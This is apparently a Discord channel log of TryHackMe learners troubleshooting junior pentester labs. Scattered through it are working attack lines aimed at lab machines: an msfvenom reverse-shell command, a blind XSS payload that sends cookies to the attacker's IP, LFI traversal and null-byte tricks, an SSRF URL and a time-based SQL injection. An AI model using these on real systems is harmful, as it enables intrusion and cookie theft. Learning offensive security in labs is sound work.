#junior-pentester-path

is || -T1 || going to be stealthy enough?

odd, my scan completed, but no flag.

how many ports does it want me to scan?

@sharp yoke use the request catcher provided in the lesson, i tried using an NC listener yesterday and the automated function on the site wasn't workign properly.

yeah I saw reddit post

thanks

here @brazen notch https://www.reddit.com/r/tryhackme/comments/qfq648/jr_pentesterxss_room/

|| sudo nmap -sS -T1 -p 8080 10.10.171.60 -vv ||

thanks

I'm curious who built the room.

ah, strategos

I'm really curious what server-side stuff it's doing to get the flag

i tried both http and https and still couldn't get it to connect to my nc listener, i had to use the request catcher provided by the lesson.

Loved the Linux privesc capstone that was good fun

Also @calm swallow itll work with just the ||-sN flag||

i got it, thanks

I'm backing up to the burp stuff because I skipped it

I remember now why I usually skip burp rooms on thm

i find burp to be so hands-on that write ups and walkthroughs are difficult to "get"

how can I request catcher :/

I'm onto win privesc next then I'm done with the path

I'll be there soon, i suspect

yeah but how am i gonna use it

i don't have no idea 😄

wait

btw ticket ending time when ?

tomorrow i think

Question about nmap: Isn't setting the urg flag good because it's much faster? Like instead of using -sA or -sW I could use --scanflags URGACK to get the results faster

i use verbose output

nmap -sV -sC -p- -Pn <ip> -vv

yes i know how to use nmap pretty good but my question was is using URG flag faster than using only ACK

hm

or using them together

and are there any downsides to that

have you tried using them together?
was there a difference?

URGACK was faster than ACK

ig you can use it since it's faster

you can use it and it's faster, but it's also really easy to detect.

not a lot of webapps set the urg flag

hi all!! i have a problem on the netsec challenge room, about the nmap scan which need to avoid IDS detection, even without scanning i got 4% or even more sometimes and a few times i avoid detection (reset packet count and after i launched nmap) and still didnt get any flags on the webpage

yeah ı finally complete

😄

yeah i thought so, but on challenges people usually use the most aggressive flags there are lol

i did a CTF last week that was dropping some of those scans

it really depends on what is going on

it's a little buggy. you'll need to refresh and reset until you get the reset message

what scan are you using?

i tried so many xD

put it in here with a spoiler tag

i even tried ||T0 -sN --scanflags ACK|| etc etc

oups sorry

you're good

i just tried with more simple and got the flag rn

are you sure null and ack scan work together?

6 h on this xD

to be honest i tried multiple mix of flags

so, make sure you're not running any other scans (like hydra)

refresh the page a few times and make sure the reset message is there

and you can actually run a scan as fast as || -T3 || on this box

i tried to put ||all flags to ACK with -sA --scanflags ACK|| etc etc

your use of || -sN || will work

Did you do it on the attackbox or your own machine? As like the hint says, with the attackbox it's working better.

yeah now i have it with just ||NULL|| and T3 is the default

stealthy 2-hour scans aren't within the scope of that challenge room (|| -sS -T0 ||)

you don't even need to bother with that

you understand it better than the challenge is really asking for, tbh

on the burpsuite intro room -- which dropdown are they asking about on task 9?

|| burpsuite makes me grumpy ||

|| OWASP ZAP for the win! ||

let me look

i have finish all the path 🙂

but no voucher for me 😦

thanks. I suspect they're looking for one in foxyproxy, but I'm just not sure which dropdown they would want unless it's in ||patterns|| somewhere

I usually use burpsuite to handle the server response editing

I am stuck on WinPrivEsc Unquoted Service Path

I am not getting a session on the multi/handler

Intercept a request in burp and right click into that request, you will find that dropdown sub-menu there.

yeah

it is in burp

deleted saltiness

intercept a request and right click

don't want it to spread

the answer is there

i got it

thanks peeps

thanks for the nmap too 🙂

something-something hashtag not my first thm burp room

i did it with cobaltstrike windows service exe

Ahh

you dont have any session or the session die quickly?

not receiving the session at all

because the service die quickly, you must migrate fast if you do it with msf

weird

everything in the msfvenom looks good

file is placed and named correctly

give me the name and the path you use in private or here with spoiler tag

and the msfvenom command used

but normally they give it iirc

What payload are you using with msfvenom?

|| msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.x.x LPORT=4444 -f exe > common.exe
C:\Program Files\Unquoted Path Service
Common.exe||

the payload that is in msfvenom I set for the multi handler as well

ok, time for me to take a break and cook dinner. have fun, all

enjoy your meal 😉

i did it with meterpreter like i said and migrate -N explorer.exe ASAP and after tried with cobaltstrike win service but all seems good from your side

i try it rn

yea I might just try again with meterpreter

rather than shell reverse tcp

remember to migate quickly since it will die

i will try when VM is up with your payload 😉

So got the remote flag, but cant get the first one. This is really getting. - X post in burp? And no content type header.

I even changed the payload to meterpreter in msfvenom and handler. I am still not catching it when stopping and starting service

let me try a different port

everything worked for me

i tried with your payload and it work

when you launch the service you use powershell or cmd?

because in powershell you must use sc.exe not sc

cmd

ugh

lol

weird

try to set lhost to tun0 in your handler

nevermind I misspelled the service

i got it now

lol

lol

that's happens 😉

that's enough for me tonight, need to sleep, sad to not have at least 1months voucher when finish all the rooms in the path 😢

good night all

Going through the Local File inclusion module. am i right in saying http://webapp.thm/index.php?lang=etc/passwd bypasses filtered keywords (such as /etc/passwd) + also if the function adds .php at the end of the input

depend on the filter and nullbyte works only on php5 and less

if the developer decided to filter keywords such as /etc/passwd and then if the function added .php at the end of the input. adding %00 would bypass them two, am i right in saying that. and yes depending on the PHP version

if php5 and less you will bypass the .php added at the end that's right

sorry if i am keeping you up hahah, just saw your goodnight all message

if it filter with a strict regex like ^/etc/password$ yeah it work

no problem 😉

Ok gotcha, just wanted someone to clear that up for me. was not 100% sure

but if he only filter with a regex who search for the word etc or for the / it will not be bypass

i hope im clear, im bad at explaining things xD

Hi! Someone can help me with SQL injection room pls from this path pls?

This is what i am referring to in regards to the question i asked

Got my Certificate!! Thanks @last shadow

Gave +1 Rep to @last shadow

Hey people, I'm trying to complete RFI inside File Inclusion in the Junior Penetration Tester Course but the command doesn't seem to do anything

post your command with || on each end of it

let me try

it's task 6

this didn't work or I did it wrong

you can also highlight text in discord and press the eyeball to the right to add the tags

could i get a hint for ssrf task 2?

i have changed 'api' to 'server' and i see how the request responds but i can seem to figure out how to implement the flag 9

where is that eyeball?

are you on Discord on your desktop?

I am

after you type or paste your command, highlight the text and a little box comes up above it

it's a payload instead of an actual command, sorry

URL payload

if you do the steps below, you could post a screenshot

!docs verify

post your whole url here with spoiler tags

thank you

Gave +1 Rep to @night hearth

| https://website.thm/item/2?server=api.website.thm/flag&x=&id=9 | this was the first one i have now literally just changed api to server | https://website.thm/item/2?server=server |

you are close

i see that is changes to server.website

to do the spoiler tag you need || on each side

oh okay

right so that is correct

sorry

but its needs more

i dont know how to implement the flag

the hint says that it needs to be at the end of your payload

okay yes

so mix your 2 attempts together

you need to add the end &x= btw

i see what its saying

if you use hint button button says this

i just said i see it says server.website

@sharp yoke

Phew! After pulling out what little hair I have left, I finally completed RFI Playground task! 😅 Glad the payload I used worked, but I'm a bit confused why the one I tried before ||<?PHP gethostname(); ?>|| didn't work, please could someone explain?

😄

i see

lol

because i dont know the format it needs to be so ive brute forced a number of different variations

@wet gulch I did the same thing at first. that is why is shows you the request at the bottom

i used the &x= because it turns it into a parameter and in the example it is never used "at the end" of the url

the examples were a little confusing

example says stock?server=api.website.thm/api/user&x=&id=123

How come ||gethostname();|| doesn't work but the correct one (which I won't spoil for others) does? I've read the descriptions for both at php.net and I don't understand the difference 😦

so i thought if youre looking for user 123 youd cahnge it to look for flag 9

thats why I said the example is confusing to the task at the end

i dont understand the syntax so ive brute forced i get what its doing not how tot write it

ok so what is your latest attempt?

to stop the remaining path from being appended to the end of the attacker's URL and instead turns it into a parameter

yes

that is why it goes at the end of your payload

now that you understand that did you solve it?

if not, let us know where you are at with your payload

none of the examples show it at the end of the payload...

okay thats great i still dont understand the syntax

or how to write it i get the payload is the file im looking for

youre requesting to get server.website.thm/flag?id=9

thats the payload

i get it i just dont understand the syntax

and what happened when you did server=server

sorry thats the wrong screenshot

so take it a step further

add more than server=server

then see if you understand what it is doing

@wet gulch did you get it?

had to step away from my pc

guys I am stuck on an authentication bypass task4 for hours any help, please??

guys I am stuck on an authentication bypass task4 for hours any help, please??

yes

guys I am stuck on an authentication bypass task4 for hours any help, please??

what have you done so far

I don't know what I did wrong but I didn't get the flag on tickets

so you made an account, and ran the curl requests, with the second one edited to match your account?

Hey guys just looking for a hint for "Vulnerability Capstone" last question:
||iv grabbed the ruby and the python2 scripts but neither of them seem to work right iv installed all deps and creted a virtualenv for good 'ol python2 but nothing seems to work right||

I had the same issue. Try using the one from the hint

Yeah the ||ruby one ?|| i was trying that I should probably just give up and use ||burp|| but I really wanted to get it going

||Ahh, for the Ruby script, did you set up a netcat listener to listen for the reverse shell?||

The one in the hint is a python script

located on the attack box

Python, not Ruby, myb

Ahhhhhhh im a dope thanks @night hearth || i see what you mean now i missed the error about non-numeric -> listener is better idea ||

Gave +1 Rep to @night hearth

when all else fails || base64 it || @night hearth 🤣

any idea why this is not working? im on the remote shell part in file inclusion

have you got a firewall up by any chance ?

Nahh no firewall, im gonna restart the machine and try again

i never have much luck with remote shell/code execution. really annoying

restarting the machine done the job 🙂

Anyone received this message before? Don't know why this happened, nor should my sub expire in the next couple of days 😕

i just had the exact same message completing the same room, how strange

Ok, i feel better now 😆

ok looks like tickets just stopped 😢

Anyone on the File Inclusion Task 8 Challenge?

On the second flag

Using curl works but I can't do anything past that

Yeah but I can't edit them

I click and deselects for me

like it's just for show

Will try

right click edit as html?

doesn't have an edit button

Go to "Storage"

Thank you!!!

Gave +1 Rep to @wispy nimbus

Two hours in this

was I supposed to get a reverse shell in the exploit vulnerabilities room?

Guys I only have access to the Admin page, nothing else?

did you use burp for the previous questions?

No, I haven't learned it yet

Play around with that cookie. Change the value to your name for instance and see what happens.

I just realized, we're not supposed to have a name in this machine

At least I didn't think so

I changed the path but it didn't work as well

What else can you change in that Storage tab if it is not the Path, to get LFI?
Also note yall: The ticket event has ended.

The domain?

Jesus I'm lost

Pay attention to the error message how it reflects the change you made to the value of that cookie.

MACHINE_IP/challenges/chall2.php?file=/etc/flag2 only shows the same admin page

tickets gone?

I just finished a room and got no tickets

Yep, it's ended

Yeah

cool! well, congrats to all the winners!

ya

MACHINE_IP/challenges/chall2.php?file=/etc/flag2 only shows the same admin page

@trail topaz

able to edit the cookie but

im stuck after that

try lower casing that cookie

got this

yeah, seems like it's a better landing page

I'm stuck here too

same

@modest arch just need a nudge I believe 😮

Keep playing with that cookie. And again, see how the error message reflects your change.

Is it possible to change? It always comes back to Guest if I change anything

srry im still stuck

Change its value in the storage tab and refresh the page.

It is what I'm doing

everytime I refresh it gets a new Guest cookie

change ur browser ig

it might help

It's the attackbox one

in the metasploit intro || eternal blue msf where is this flag.txt , iv been to every bloody folder at this point i think ||

I am not familiar with the AttackBox.
You have to be able to change the value of the stored cookie and refresh the page.

Yes I can do that

The only one that says Get that flag is admin

okay i am done thanks @modest arch

Gave +1 Rep to @wispy nimbus

So you want to see the "Get the flag" message or get the flag? I think the arrows in that screenshot are quite a fair hint.

yep

bruh I just feel stupid, I know I'm close

Close. But you are not using everything you've learned.

bruh soo close

I'll keep trying

you can see that the function adds a .php at the end of your entry, how would you bypass this?

keep in mind your current path

also

yes it's what I just noticed

Nice profile pic by the way

You too!

F'in hell I did it

Thank you all, now I can sleep

did u get flag3?

are you stuck on flag3?

ya all signs are filtered

They may be the way that you are attempting, but they are not other ways

did you research $_REQUEST, to see what its uses

doing that

Off to sleep xD

Tomorrow I'll try

Stay well guys

i have gone through php.net manual

not getting

so it accepts GET, POST, and HTTP HEADER

maybe try a different type of request to the page

Well this sucks. I thought we had the whole of the 31st to get more tickets...it looks like no one won any of the more lucrative prizes

i.e. Cert vouchers

still on that

not getting

@urban whale i am stuck too

flag 3

?

i am on get the flag page

which task?

file inclusion challenege 2

i completed that

its all about cookie

I was literally typing that haha

i m still on that challenge 3

try a|| POST request||

the default isnt POST ???

which tool are you using?

default is normally a GET

suit

I personally used curl on that challenge. Let me try it in Burp

it works

i solved challange 1 using that only

yea Burp can do it also

even easier in Burp

ok so make sure to use the spoiler tag || on either side of the spoilers. what did you do in Burp so far

did you get flag3?

now what?

yup

play with that cookie and keep an eye on what error is produced

||I did that with 2 method 1 just converted GET into POST + Content-Type: + file=...
another
make a normal Get req. and intercept that response and changed the GET parameter to POST in page source ||

@urban whale is that for flag 3

need to use burp?

its easy on burp,Curl can also do that

i was decoding the URL from that time lol

for challange 3 where to Host the file ?

@night hearth

can u help

challenge 3 in File inclusion?

or you mean the Gain RCE in File inclusion

RCE

so you will need to create a webserver on your attackbox to host it

Python3 has a very simple way to do so if you google it

ok

not sure if this is the right channel to ask but having troubles with this question . Use grep on "access.log" to find the flag that has a prefix of "THM". What is the flag?

i did but i dont think that while doing RCE the txt file is hosting ... but it is visible in my browser

are you doing a room in the Jr Pentester path?

nah its under the linix fundamentals

what does your payload that you put in the browser look like

||http://10.10.28.160/playground.php?file=http://192.168.1.77:9001/Desktop/cmd.txt||

not quite sure that I understand the question. The flag will be THM..... it could be THM-123456789 or THM{theflag}

just starts with THM so you will need to use grep to find a line that starts with THM

Are you VPNing in on your own box for the challenges?

yes

I believe you may be using the wrong IP for your machine. you should have a 10.10.x.x IP

u mean the file hosted IP ?

yes

okay i am doing trying with attackbox

that should make things much simpler

Done

thanks

Hello, I am working on the Linux PrivEsc (https://tryhackme.com/room/linprivesc) Room. Not able to understand how to run the CVE on the server. Could anyone please help?

tried scp to upload the CVE file, but then cannot locate the file on the server due to denial of permissions.

How are you trying to locate the file? But either way, with scp you anyways specify the directory in which you upload the file, so I'm a bit unsure why you can't locate the file.

ok maybe I am not using scp well... I opened the directory where I saved the file... then scp FILENAME karen@SERVER... I think I didn't mention the directory... the thing is default "pwd" on the server is at "/", do I need to mention it? @shadow echo

What's the full scp command you tried?

that one I mentioned is the full command... scp 37292.c karen@10.10.110.108

Okay, well then I would first check if you have write permission to /home/karen (which you normaly should have) and then use scp 37292.c karen@10.10.110.108:/home/karen

If you have access to that machine just:
cat apache2/access.log | grep -i "thm"

-i flag meaning not case sensitive

is there any way I could know the upload has been a success or not?

Not sure if scp will give you a reply, I barely use scp. But you can simply check the folder you uploaded it to afterwards.

well I actually don't think I have write permissions... let me see...

no... "Could not chdir to home directory /home/karen: No such file or directory"

What task of that room are you on?

task 5

pwd is at /

Okay, then you simply have to search for a different directory where you have write permissions to, maybe try /tmp

scp 37292.c karen@10.10.192.92:/

Stuck at this, no response... the shell is not coming back to usual after finishing of operations, unlike the last command w/o the directory.

just now it replied connection timed out, re-trying.

ok sure... working on it then 😄

Btw, you know what the pwd command does, right?

denotes the current directory where the shell is at, right?

It prints out the current working directory. So if you are inside /home and you enter pwd, it will print /home. If you are inside /home/whatever/whatever2 it will print /home/whatever/whatever2 . And only if you can access a directory, doesn't automatically mean you can write to it.

XSS Task 8 (Blind XSS Practical)
I am connected to THM VPN through Kali running in VM and do not get any traffic through nc.
(Is the port in the script supposed to be identical to the port in the nc flag?)

Just to remind everyone, The XSS Task 8 box is buggy and you might have to restart it to give you a proper http request. Try using the thm catcher thing if standard nc doesn't work

If you can't get a request while manually opening the ticket after your created it, then there is something wrong. The port has to be the same in you xss payload, yes. If it's only about that the ticket is not getting triggered by the staff member, then you might restart the target machine or use the attackbox or request catcher.

I am not sure about my configuration. The IP and the port in the JS script have to be like my IP:PORT showing under tun0 in ifconfig, right?

oh right...

In Command Injection room, for detecting blind RCE, it says one way is to force an output.

For example, we can tell the web application to execute commands such as whoami and redirect that to a file. We can then use a command such as cat to read this newly created file’s contents.
but isn't the whole point of blind RCE that we weren't supposed to (maybe in some cases we CAN'T?) see any verbose output? If the file is then read using cat, how will I even know that the server executed the cat command? Even if it does, What is the use? I won't be able to see it

Have you specified a port with nc ? If yes, then you have to use the port as well. And yes the IP will be your tun0 IP, IP:PORT will be the right way then.

I followed the instructions and setup nc with nc -nlvp 9001 . I am missing some knowledge here. If the JS fetches the cookie with specifying the IP:PORT of the user visiting the website, why and how would it get sent to port 9001?

Read the breakdown of the payload in task 8 again. The fetch() command makes an HTTP request. The IP:PORT is where the http request will go to, so therefore it's always your IP:PORT as you want to catch these requests.

If so I would have to set up nc on the port showing in ifconfing under tun0 I guess and not 9001?

I'm not sure what port you are referring to, there should be no port being displayed with ifconfig?

Sorry. Meant ip address

Well if you talk about the /16 after your IP, that's the suffix for your subnet, as far as I know.

So your IP will be without the /16

I entered into the JS script my IP with 9001 as the port. </textarea><script>fetch('http://{my_tun0_ip}:9001?cookie=' + btoa(document.cookie) );</script> and nc is running on 9001. I opened that ticket and nothing shows up. Back to square one.

You removed the { } right?

what you mean by entered into the js script??

because you just need to put it in the message

you must enter the payload in the message of the ticket

I was referring to the JS script entered into the message.

ok

Did that.

so after that just a nc -lvnp 9001 must work

try on the attackbox if you were on your pc

hi all, i forgot 🙂

I am just a bit stubborn trying to understand why it does not work.

sometimes quotes or double quotes are messed up when copy/paste

it can be that or not the good ip, verify your tun0 ip too

Maybe try to restart the target machine, as I don't see why that wouldn't work.

yeah +1 try restart the machine or your vpn or try the attackbox 😉

if ip is good, normally 2min after posting your ticket you must have a connection to your nc listener

The tickets giveaway is finished?

someone win the OSCP or eJPT??

I think everything is set up right.

Tried already...

yeah everything seems fine

have you still got tickets, or not ?

Are you using a VM?

Yes, VirtualBox

try with the attackbox

And openvpn is only running inside your VM and not on your windows host (or whatever host OS you use) as well?

grrr i was near some voucher grrrr

Actually, openvpn is running also on my host OS (Fedora). (Diffrent VPN though)

Well then I would try to turn that off to see if that solves your issue. Although if it's not the THM vpn shouldn't matter as far as I know, giving it a try might be worth it.

the easy way to verify is the attackbox

if he has a callback on the attackbox nc listener, there is a problem from his vm network

I thought that tickets will be granted till today include.

@tropic dust Let's keep the conversations to continue here, so everyone can see it and maybe help you out. So what's the CVE you found? I assume you are on task 5, right?

yes task 5, disclosing the CVE will actually be a spoiler 😅

Then write it and delete the message after I saw it 🙂 Or put spoiler tags.

CVE-2015-1328

I dont think we can put spoiler on texts... images it works

you can put spoiler on text 😉

this is a ||spoiler||

how to do that? 😅

select the text and the latest icon

You can put spoiler on text. Anyways, just delete it then 🙂 Have you read the instructions inside that cve? It's explaining you on how to run it.

Hi!! trying to understand PATH Privilege Escalation. Don't need any hint, just learning. I execute the script from /usr/bin and from /home/murdoch, and i can get root. But if i copy the script to /tmp, permissions are denied. Why is that? Any advice?

Is /tmp a directory non executable?

check ls -l /tmp and if the script is set to be executable

yes it is

the issue is that if a copy the script to the /tmp directory, doesn't do the job. instead, if o execute the script from /usr/bin or from /home/murdoch, it works

and i am trying to guess why is that

Did not solve that issue. In AttackBox , which IP I am supposed to enter? docker0, eth0, lo?

eth0 on the attackbox

I also had some issues with nc when I did that task... in the end I used the listener they provided me

Is /usr/bin and /home/murdoch in the PATH variable and /tmp not? If yes then that's the reason. Just an idea, not even sure on what task you are 😄

yeah ok, that's right. got it. Ty fontaene

Gave +1 Rep to @shadow echo

OK. nc caught a cookie, but after decoding it, it's still not the right answer. Any clue?

Did you open the ticket on your own after creating it?

Yes. And I decoded it. Tried entering with "session=" and w/o. Nothing worked.

Then it's your own session cookie that your received. But at least you verified that you receive the request. You have to create the ticket and wait until the script that's somewhere behind gets triggered and is opening the ticket as a staff member. Something with that triggering is buggy, so as long as you know now that your xss payload is working fine, you just have to wait 1 - 2 mins, if you not getting anything try to restart the target machine or use the request catcher.

Done. Thanks a lot.

Gave +1 Rep to @shadow echo

After I am done, I still do not understand how this works. Why does this script send a local session cookie and a staff session cookie to nc? I am missing something fundamental here.

If you XSS yourself, you'll get your own token

The script will always be executed in the browser of the person that is opening the ticket (in that example). So if you open the ticket in your browser, it will be executed there, regarding to the break down what each of these commands is doing. If someone of the staff members is opening the ticket, the script will be executed in his browser and therefore grabs his cookie and sends it. The individual cookies are also stored in the browser.

I got that. Actually, I did receive also my own token. But how does this work that I receive a staff-members token??? Is there some automation behind the scenes on this website that every ticket gets opened from the backend?

Yes

To emulate a physical admin user that might be checking

Now things are starting to make sense to me. I was wondering the whole time what am I trying to achieve with this JS. Thanks.

Gave +1 Rep to @idle bison

Additional question: Why do I have to encode the cookie in the XSS and later decode it? Why can't I just fetch it the way it is?

To make sure it gets transmitted correctly.

What would happen if I would not do that?

Well maybe for that session cookie nothing, but as far as I know, if there are some special characters in the initial cookie, it could get interpreted the wrong way and therefore not receive the cookie in the way it was. But I would rather suggest you look that up on your own, in order to make sure I'm not talking bs 😄

I'll let you know 👍 Thanks.

Gave +1 Rep to @shadow echo

Hi fam, I'm working on xssgi (last task: task8 practical of blind xss) room of Junior pentest path, and I'm pretty certain that my answer is correct but it says wrong.

How did you receive the session cookie? By opening the ticket you have created?

I am stuck in File Inclusion Lab, Challenge 2. I have managed to get admin access manipulating the cookie. I am trying different combinations of url in the browser to gain access to flag2 by using ?file= such ../.. walthrough including ....//....// or %00 at the end. I have even tried to include a POST form based on the code of Challenge 1. No luck. Could someone hint me if I am on the right track or am I missing something. Should I use curl or can this be solved simply manipulating the url path to the file?

play around with the cookie value to see how the webpage reacts.

thru nc sir

You mean the value of admin or the other values? Thanks.

I meant, how did you trigger the xss? After you have created the ticket with the xss payload. Did you open the ticket ?

ahh yes.

If you think over it again, how would you get the staff session cookie if you trigger it on your own, if it's getting executed by your own browser, you will only get the session cookie of yourself.

The value of the cookie itself. So if you open the dev tools to check out the cookie, you see the field/tab that's called value.

Yes, I already obtain access as admin by changing admin and value to true. I have refreshed and have admin access and it tells me I can go to capture the flag. I can now obtain the flag, but when I am including the in the url ?file=../../../../etc/flag2 (and different variations) I am not able to view anything in the browser. Not even by inspecting the html. You are still saying I should work on the cookie or am I doing something wrong when typing in the url? Thanks.

Gave +1 Rep to @shadow echo

Yes, work on the cookie value to see how the site reacts to it.

should i just be patience?

If the automation that's going to trigger the ticket to be read as staff member is not going to do it within 2 - 3 mins I would try to restart the target machine, use the attackbox or the request catcher. It is a bit buggy I think. At least you verified by opening the ticket on your own that the payload is working.

okok. will try to restart my machine. hang on sir 🙂 thanks by the way

Gave +1 Rep to @shadow echo

hi guys

I'm trying to do the metasploit module, and on the rev_shell.elf task I'm getting this error

||Segmentation fault (core dumped||

On the machine I'm supposed to get a meterpreter

When I launch the ||./rev_shell.elf||

This is my handler

|| msf6 exploit(multi/handler) > options

Module options (exploit/multi/handler):

Name Current Setting Required Description

Payload options (generic/shell_reverse_tcp):

Name Current Setting Required Description

LHOST 10.13.23.79 yes The listen address (an interface may be specified)
LPORT 7777 yes The listen port

Exploit target:

Id Name

0 Wildcard Target ||

I'll look at that right now

I think it is, let me check

This is the command for the .elf file

|| msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f elf > rev_shell.elf ||

The one on the module

I see that

Ok, let me try again

Will tell you the results

If I use another name different that Guest or Admin, for example root, I get the following Error: Warning: include(includes/Admin.php) [function.include]: failed to open stream: No such file or directory in /var/www/html/chall2.php on line 37 If I then try to transverse using =file? I still get the same error. I am lost. I need help or to provide me a link or course to understand what I am missing.

Ok, it's done. Thank you!!!

Gave +1 Rep to @steel nymph

Sorry I meant: Warning: include(includes/Admin.php) [function.include]: failed to open stream: No such file or directory in /var/www/html/chall2.php on line 37 I also tried ?lang= and failed. By room you mean the actual documentation of the course (Task 4) or some other place?

challenges/chall2.php?file=../../../../../../etc/flag2 Is what I was using.

room Linux privesc - task 5

i tried scp, wget, curl

but not able to transfer exploit to target machine

So after changing the cookie value, are you even refreshing the page? As for your example when you change it to root, your warnings should look different.

Yes, with admin I get the welcome admin but when I change it to root and refresh(several times) I get: Warning: include(includes/root.php) [function.include]: failed to open stream: No such file or directory in /var/www/html/chall2.php on line 37

Warning: include() [function.include]: Failed opening 'includes/root.php' for inclusion (include_path='.:/usr/lib/php5.2/lib/php') in /var/www/html/chall2.php on line 37

Okay, so what does that warning tell you then? Warning: include(includes/root.php)

Yes, I also modified the url to include challenges/includes/admin.php and then try transversal without luck.

Not sure why you are doing something with the url when you get that warning. Warning: include(includes/root.php) If with that warning it is unclear, you should reread the previous tasks.

OK, I tried a a different approach and using file:///etc/ I see now the files and directories including the passwd file but there is no sign of flag2, unless the it is hidden. And even trying to do file:///etc/flag2 reveals nothing.

It is also showing hidden files.

I don know what else to try to get flag2. Are you saying that I should continue to try by using another method? In any case, if using file:// reveals the etc folder and I don see the flag2 in it perhaps it may be because it is simply missing?

Thanks for you patience lassi. If I input /etc/flag2 as the value of the cookie I get the following error: Warning: include(includes//etc/flag2.php) [function.include]: failed to open stream: No such file or directory in /var/www/html/chall2.php on line 37

Gave +1 Rep to @steel nymph

I don't understand this server... I do a little work and after sometime the shell just stops taking any input... this is happening only on this server...
And yes, how to enable a spoiler alert on text?

Or if on windows client you can highlight your text then click on the eye logo

or also "/spoiler"

also... running the CVE on the server opens up a mini-shell with root priv, but it doesn't run half of the commands like cd or cp...

really stuck on task 5 of Linux Priv Esc room, someone out here to guide?

Room: File Inclusion

in the last section if I try to access the challenge 2 it says "refresh the page please" and i don't know how to fix that

yea nothing changes

even clearing the cache is useless

nop

i only get response cookies tho

yes exactly.

this is what i get

i tried without extensions and i get the same result

i tried changing them but I always get the same response cookies

I'll try

the download did give me a .c file... I compiled and ran it. the object code file exists in the server.

still nothing

i forgot to add the spoiler mb

and how do i input multiple values?

ooh

ok got it

thanks

Hi guys. I'm dealing with Windows Privesc room Task5 DDL Hijacking I'm on last step that I have to log in as jack, but I don't have da option to switch on another user. I also tried with ssh..

Found it. Rereading it and understanding how include works helped. Thanks!

Gave +1 Rep to @steel nymph

Are the tickets not available anymore? I thought today is the last day

I am in the Authentication Bypass section task 3 but gives me error 😦

yeah me too but it ended the midnight i guess

Right. Thanks

Gave +1 Rep to @steel nymph

so should i create my own txt file ?

thank you!! ❤️

Gave +1 Rep to @steel nymph

I created my own list

like this :

but still have errors

don't get it

make it one name per line and no commas 😉

nope 😦

yup, that and maybe try to create a new file with a different name maybe like "valid.txt" (but don't forget to change on the ffuf command as well

i tried every username like this but still gives me error

have you tried rebooting your machine?

Can I try to do it on your target machine, to check if it's an issue with your machine?

of course but how ?

yes like 5 times

I mean I see the IP in the screenshot, so if you haven't restarted the machine I can just run ffuf

nope give it a try

thank you ❤️

If you run curl 10.10.10.10/whoami on your own machines terminal what's the IP you get as a response?

what is 10 10 10 10 ? :/

Just a thm machine for vpn purpose

i wait but nothing shows

So can you access 10.10.10.10 in your machines browser?

ovvvvvvvvvvvvv waitttttttttttttttt

gosh

don't start my vpn thing

😄

yes now

it's working

Okay, so what's the IP you get as a reply to the curl command?

ffuf worked :/

i solved it

Alright 😄

i didn't run the openvpn thing at first

Ye

I am in need of help with this question been working on it for 2 days is it a joke ?

https://gyazo.com/eec9c78d4736adee6b65d50070659a08

Use grep on "access.log" to find the flag that has a prefix of "THM". What is the flag?

what are you trying?

i try doing a grep "THM" access.log

figure with it being a prefix looking for somthing that says THM

very close

noooo ITS NOT

lol

fuck let me figure it out then

lol

or is it some bull shit i am not typing right ? lol

hmm so using grep it would just look for THM if there is any

are you in the same directory as accesslog

so i am not suppose to be in the root

where is access.log located

im booting up the task now

okay ty

i might be overthinking this soo badly and going to piss me off l8r lol when i figure it out

so grep "THM" access.log works perfectly for me

do you get anything returned?

let me see

https://gyazo.com/d7916cbcbb85a6bb0fded6ab5b871a14

you need to launch the machine in task 3 of linux fundamentals

your attackbox does not have the file access.log

OMG LOL

see that the error you are getting is no such file

yea

if you do the ls command you can see the files in your current directory

i get it now

eheheh it happens sometimes 😅

well i kno to start my task 3 window lol

waht have you done differently for it to work?

Is there a workaround for Task 5 in Advanced Nmap?
I'm entering the command as they suggest but the password is incorrect.
Scp pentester@my-machine-ip:/home/pentester/* .
To copy files
It prompts for password and I enter given password THM17577
Permission denied, please try again
Pls helpppppp

🎃👻

What room?

Hi guys, I'm a little confused about challenge 1 of the LFI part (https://tryhackme.com/room/fileinc) on Task 8.

For the first Challenger, we need to do a POST search to reveal the /etc/flag1 file.

I use postman, and I made a POST request with the link
http://10.10.17.108/challenges/chall1.php?file=/etc/flag1

And it does not work ...

Can you tell me why?

You need to understand the difference of a GET request and a POST request. As the way you are trying to send the parameter is supposed to be used in a GET request and not in a POST request.

https://www.w3schools.com/tags/ref_httpmethods.asp

Ok thanks bro i will check that thank you @shadow echo

Gave +1 Rep to @shadow echo

Thank you @steel nymph

Ye, that might be something they could fix, anyways they mention it has to be in the request body. But it's good if you add that info in case he is doing it with burp 🙂

Yes it works thank to yours answers guys, and thanks to to request body

Tahnk you ! 😉

Hi, it was the victim machine's ip

Hey everyone, so I am currently struggle bussin through task 8 of the SQLi room.
It appears to be a topic of discussion, might someone be able to review/confirm the logic?

So I am able to get the 5 second response time with the following:
|| admin123' UNION SELECT SLEEP(5),2 FROM information_schema.COLUMNS WHERE TABLE_SCHEMA='sqli_four' and TABLE_NAME='users' and COLUMN_NAME like 'password' and COLUMN_NAME !='id'; ||

Appreciate it @steel nymph

I have no longer gotten ant ticket since yesterday evening. is this expected? I thought it's extended till 31st Oct ?

I have a question i don't see my kali user after windows update

and terminal appearance is change

now i see

this is sus

Morning guys, have a great day!

this have been usefull for me! @analog quartz you too

Did you ever get past this? I'm having the same error

I’m working on Practical : Command Injection under the Command Injection box. None of the commands I’m inputting are returning anything, is this room bugged?

Yes

Pings the server. Sends back 4 packets. Problem arises when I input any injection code from the cheat sheet. Nothing posts. Perhaps I’m misusing it?

Yeah, attempting Linux commands is getting nothing back. I.E. ping 127.0.0.1, whoami 127.0.0.1, etc

Hey, is there any way I can get a web view of my curl requests / tamper cookies from browser? I'm at file inclusion challenge 2

Yep, dev tools

Hmm how do I do that? I'm able to read the request along with the cookie that goes with it but I cannot find a way to edit it

If you are using Firefox check the "Storage" Tab

in curl i think it is a -H "<name>:<value>"

Oh nice I think I got it, and yes that's correct for curl, thank you @vital lake !

Gave +1 Rep to @vital lake

So the task is wrong? I will try it, thank you!

Gave +1 Rep to @steel nymph

All i needed was to stop the machine, refresh the page and restart the machine.... it's working now, but thanks!

Anyone able to help with SQL injection task 7?

I'm trying to enumerate the column names but no matter the character I use to do so, it returns false. If I take it a few steps back and do the table names it works though.

I even scrolled a little bit further into the section and saw the column names, then tried searching for the first character of those and matching with column_name = parameter and it still returned false.

It this a bug in the lesson or am I dumb?

